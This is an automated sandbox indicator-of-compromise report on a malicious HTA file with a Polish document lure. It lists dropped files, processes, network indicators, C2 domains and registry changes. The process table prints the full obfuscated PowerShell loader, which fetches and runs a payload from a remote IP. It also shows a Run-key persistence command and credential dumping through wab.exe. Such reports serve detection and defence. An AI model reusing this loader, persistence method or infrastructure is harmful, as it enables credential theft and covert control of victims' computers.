IOC Report
PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta

loading gif

Files

File Path
Type
Category
Malicious
PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta
HTML document, ASCII text, with very long lines (335), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\mvourhjs.dat
data
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x4e16ba81, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anlhyd2a.ak3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogm1bns0.mhm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wssq5mjn.q0w.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcaoq430.eu4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv5CE7.tmp
Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\chp62E3.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\chp6361.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Idealogical143.cho
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
Chrome Cache Entry: 78
ASCII text, with very long lines (786)
downloaded
There are 15 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teShunnFundtOver ');Oraklerne (Bortledede ' Spe$ BasSTrsktQ,inaDatatSam iGennsVuggt ndsi,debkDalieColdr.hirspana.CracHuncueThroawa.edP.ogeUndirThe sSyns[Lder$ Conpundir TauoConslLictoPyrog.kraf,eamo BolrSpect GhuoAarelGreyk Kole nskrFdesest,a] nd=In,x$BirsRHaemhinane SaloNovap.pech P woSemirSanie Is ');$Jotas=Bortledede 'BrilS,evrtNonea Ho.tKyndiGodds R,ttSe,viguldk lawe ikar BeksCher.D.ntDUnyooTilbw No nE.lblEquaoUku.aCo.ndFladFUnsliCorrl Fore ryp(U,de$TranRExtee G,onRectpSuperFartiEgsjsEmbrePle,nAlka, .ra$Fl rN Rape BesvA.coiDelilPin,lProde Nons Sk ) imp ';$Jotas=$Frogmen[1]+$Jotas;$Nevilles=$Frogmen[0];Oraklerne (Bortledede 'M mm$Dameg .psl,lvso Ma bSpejaEndulfy.r: HjlGLejea KallKarri lord SejiG.imaVerd=Malp(SkudTBoate .issUintt Fri-Har,PClipasprit RavhUngr Disk$fejlN rheArbevHob.iL.tmlLys.lFo.teKon,s Van)Supe ');while (!$Galidia) {Oraklerne (Bortledede 'Fnat$Lenig SkalFrplo OphbIn.iaSuc l ur:DryeY.rowdGalirCo se Polr OpsnBl geNon,= nn$ScratEfter Endu,rleeDdss ') ;Oraklerne $Jotas;Oraklerne (Bortledede 'Un,vSAlchtR.meaP.nsrSlv.tW,tt-,uttSBeholInqueTe.meEskipFolk Kna.4 Non ');Oraklerne (Bortledede 'Forb$SamugrenolU.aboety.bHasma Fa,lma.r:tilhGPrj,aPolllso eiAfkrdMentiComaaitch=L,sk(AcraTSamoeSub sIsoctU,ad-Re,pPPse.aBengtNondhPagt Mast$ Ma,NTrane triv KlaiYurul Ratl v,leBiocsUnme)Esc. ') ;Oraklerne (Bortledede 'Bi t$KlimgStamlTempofngeb,ndeaDi clTaxa:H,reF D so ForrTu ksBagtiUdstk.frerskakiAjstn dengSub,sUnisuN ned MicgEngii,sylf.lagt ipe= .de$SoldgGyrol elvo TegbK.olaAntilColl:MunkJCabauOlied ,tnaSig iGowfs denmGaule .ff+gorg+I.ra% Ko,$RehnDOr.eiMetasBatcpFinaoTalmnGebeePol,n fo,tAcoee GlonPellhPhotePredd SeieGastn Apo.ImoecVerboSnoluT,kenForetColl ') ;$Renprisen=$Disponentenheden[$Forsikringsudgift];}Oraklerne (Bortledede ' Ho.$Bit.g CerlUdlaoOv rbRepea T,plPl t:S bnSDelfy NedvFlngaH,fta CobrBoarsPam.dHa lr Bree Cirn Speg oseCons skri=Bis. NickGCrype TvitReco-DitrC OveoUdginBagatPonde D.sn UnctEter Gen$Fo.uNspise Bugv D ciDobblSylll,ryge Eles mo, ');Oraklerne (Bortledede 'Beun$VaaggImp lNiu oO llbTrttabojal Smo:AnalD A.meLangcUnhooH mmmArrhpQ.anrO.spe libsOb asUniniPostvS aae Dek Un e=Havf Pelo[ arcSParky ddysselvtRet.eAflamFyrp.CompCmejso Vren SynvP,oteAarsrSnortFaxe]excu: rd:SkraFDolkr I,soHoflm ayeBAf.oa UdlsPseueS aa6Robo4OxydSMunitProsrBrakiSkuen ExcgBria(Band$UdlaSUnsyyMothv ph,a .isaMun.r Fols Svad ud r .ave ResnOutbgD iveA.da)Inge ');Oraklerne (Bortledede ' aci$Overg Aabl ibroCe,tbStj.a D,nlForl:SextSFanta,rimaIncomCouna .chsHammk,rskiOplanCh,leFllesPara Wood= Han Cu v[ .prSDemoy,rops FirtSp deUform K.m. KapT CaceSl,axNonitThe..Vas EAr enTermc .loo ,ondundeiRippnredegDoo,]Dise:Imbe:BeelAReseSBeskCT ocIUndiI Op.. gleGYasheHositPo,lSKundtModsrEpuli,lagnUnw.gSyn.( dr$ .asDHenhePlaucsengoAn um SubpTararAcc eFilmsThussNutmi Uidv.alle Se )Unso ');Oraklerne (Bortledede 'Skol$e fogCroolLorgoFli,bFlueaCu wlGrun:DimpE.anscHannoUn,onFireoEnstm TiliP,riz PhiaLongtTilli,anio,eadnOutl=Fore$barnSf eea kroa hopmRetaaPrecsSydvkChemi,mstn ueleT,lhsVeri.MechsBasiu SkibPlaysP,pitDiskrSi.aiConcnSa igDelo(Reco3,urv2Ting4 Cau8Hydr1Lame0Chem,Slb.2Sun 7,jae9Sukk2 Ove5Kl.g)Skel ');Oraklerne $Economization;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teShunnFundtOver ');Oraklerne (Bortledede ' Spe$ BasSTrsktQ,inaDatatSam iGennsVuggt ndsi,debkDalieColdr.hirspana.CracHuncueThroawa.edP.ogeUndirThe sSyns[Lder$ Conpundir TauoConslLictoPyrog.kraf,eamo BolrSpect GhuoAarelGreyk Kole nskrFdesest,a] nd=In,x$BirsRHaemhinane SaloNovap.pech P woSemirSanie Is ');$Jotas=Bortledede 'BrilS,evrtNonea Ho.tKyndiGodds R,ttSe,viguldk lawe ikar BeksCher.D.ntDUnyooTilbw No nE.lblEquaoUku.aCo.ndFladFUnsliCorrl Fore ryp(U,de$TranRExtee G,onRectpSuperFartiEgsjsEmbrePle,nAlka, .ra$Fl rN Rape BesvA.coiDelilPin,lProde Nons Sk ) imp ';$Jotas=$Frogmen[1]+$Jotas;$Nevilles=$Frogmen[0];Oraklerne (Bortledede 'M mm$Dameg .psl,lvso Ma bSpejaEndulfy.r: HjlGLejea KallKarri lord SejiG.imaVerd=Malp(SkudTBoate .issUintt Fri-Har,PClipasprit RavhUngr Disk$fejlN rheArbevHob.iL.tmlLys.lFo.teKon,s Van)Supe ');while (!$Galidia) {Oraklerne (Bortledede 'Fnat$Lenig SkalFrplo OphbIn.iaSuc l ur:DryeY.rowdGalirCo se Polr OpsnBl geNon,= nn$ScratEfter Endu,rleeDdss ') ;Oraklerne $Jotas;Oraklerne (Bortledede 'Un,vSAlchtR.meaP.nsrSlv.tW,tt-,uttSBeholInqueTe.meEskipFolk Kna.4 Non ');Oraklerne (Bortledede 'Forb$SamugrenolU.aboety.bHasma Fa,lma.r:tilhGPrj,aPolllso eiAfkrdMentiComaaitch=L,sk(AcraTSamoeSub sIsoctU,ad-Re,pPPse.aBengtNondhPagt Mast$ Ma,NTrane triv KlaiYurul Ratl v,leBiocsUnme)Esc. ') ;Oraklerne (Bortledede 'Bi t$KlimgStamlTempofngeb,ndeaDi clTaxa:H,reF D so ForrTu ksBagtiUdstk.frerskakiAjstn dengSub,sUnisuN ned MicgEngii,sylf.lagt ipe= .de$SoldgGyrol elvo TegbK.olaAntilColl:MunkJCabauOlied ,tnaSig iGowfs denmGaule .ff+gorg+I.ra% Ko,$RehnDOr.eiMetasBatcpFinaoTalmnGebeePol,n fo,tAcoee GlonPellhPhotePredd SeieGastn Apo.ImoecVerboSnoluT,kenForetColl ') ;$Renprisen=$Disponentenheden[$Forsikringsudgift];}Oraklerne (Bortledede ' Ho.$Bit.g CerlUdlaoOv rbRepea T,plPl t:S bnSDelfy NedvFlngaH,fta CobrBoarsPam.dHa lr Bree Cirn Speg oseCons skri=Bis. NickGCrype TvitReco-DitrC OveoUdginBagatPonde D.sn UnctEter Gen$Fo.uNspise Bugv D ciDobblSylll,ryge Eles mo, ');Oraklerne (Bortledede 'Beun$VaaggImp lNiu oO llbTrttabojal Smo:AnalD A.meLangcUnhooH mmmArrhpQ.anrO.spe libsOb asUniniPostvS aae Dek Un e=Havf Pelo[ arcSParky ddysselvtRet.eAflamFyrp.CompCmejso Vren SynvP,oteAarsrSnortFaxe]excu: rd:SkraFDolkr I,soHoflm ayeBAf.oa UdlsPseueS aa6Robo4OxydSMunitProsrBrakiSkuen ExcgBria(Band$UdlaSUnsyyMothv ph,a .isaMun.r Fols Svad ud r .ave ResnOutbgD iveA.da)Inge ');Oraklerne (Bortledede ' aci$Overg Aabl ibroCe,tbStj.a D,nlForl:SextSFanta,rimaIncomCouna .chsHammk,rskiOplanCh,leFllesPara Wood= Han Cu v[ .prSDemoy,rops FirtSp deUform K.m. KapT CaceSl,axNonitThe..Vas EAr enTermc .loo ,ondundeiRippnredegDoo,]Dise:Imbe:BeelAReseSBeskCT ocIUndiI Op.. gleGYasheHositPo,lSKundtModsrEpuli,lagnUnw.gSyn.( dr$ .asDHenhePlaucsengoAn um SubpTararAcc eFilmsThussNutmi Uidv.alle Se )Unso ');Oraklerne (Bortledede 'Skol$e fogCroolLorgoFli,bFlueaCu wlGrun:DimpE.anscHannoUn,onFireoEnstm TiliP,riz PhiaLongtTilli,anio,eadnOutl=Fore$barnSf eea kroa hopmRetaaPrecsSydvkChemi,mstn ueleT,lhsVeri.MechsBasiu SkibPlaysP,pitDiskrSi.aiConcnSa igDelo(Reco3,urv2Ting4 Cau8Hydr1Lame0Chem,Slb.2Sun 7,jae9Sukk2 Ove5Kl.g)Skel ');Oraklerne $Economization;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2420,i,2104451589269232737,4580126100320580491,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
There are 10 hidden processes, click here to show them.

URLs

Name
IP
Malicious
jgbours284hawara01.duckdns.org
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://geoplugin.net/json.gp
178.237.33.50
malicious
https://duckduckgo.com/chrome_newtab
unknown
http://www.imvu.comr
unknown
https://duckduckgo.com/ac/?q=
unknown
http://87.121.105.163/Subumbilical.dwpXR
unknown
http://geoplugin.net/i
unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binE
unknown
http://geoplugin.net/json.gp0
unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binLysrsRafduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi
unknown
https://contoso.com/License
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://www.nirsoft.net
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://www.google.com
unknown
https://aka.ms/pscore6lB
unknown
http://geoplugin.net/json.gpI
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://login.yahoo.com/config/login
unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
142.250.80.100
http://www.nirsoft.net/
unknown
http://www.imvu.comata
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin/u
unknown
http://geoplugin.net/json.gp_
unknown
http://geoplugin.net/json.gprqDS
unknown
http://nuget.org/NuGet.exe
unknown
http://geoplugin.net/json.gpg
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMiZy7EGIjA7qK4Mr9pBN6mKzvK2lTskjhTK6lIPUikSw97szio8blseDN54zxFJKYhz_ihMLFIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
142.250.80.100
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://87.121.105.163
unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binCu
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://crl.ver)
unknown
https://www.google.com/async/newtab_promos
142.250.80.100
https://www.ecosia.org/newtab/
unknown
https://github.com/Pester/Pester
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://www.google.com/async/ddljson?async=ntp:2
142.250.80.100
http://87.121.108
unknown
https://g.live.com/odclientsettings/Prod/C:
unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
142.250.80.100
http://geoplugin.net/
unknown
https://www.google.com/accounts/servicelogin
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
http://87.121.105.163/Subumbilical.dwp
87.121.105.163
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
87.121.105.163
http://www.ebuddy.com
unknown
There are 45 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
jgbours284hawara01.duckdns.org
192.169.69.26
malicious
jgbours284hawara02.duckdns.org
45.88.90.110
malicious
geoplugin.net
178.237.33.50
www.google.com
142.250.80.100

IPs

IP
Domain
Country
Malicious
45.88.90.110
jgbours284hawara02.duckdns.org
Bulgaria
malicious
192.169.69.26
jgbours284hawara01.duckdns.org
United States
malicious
142.250.80.100
www.google.com
United States
192.168.2.5
unknown
unknown
239.255.255.250
unknown
Reserved
87.121.105.163
unknown
Bulgaria
178.237.33.50
geoplugin.net
Netherlands
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
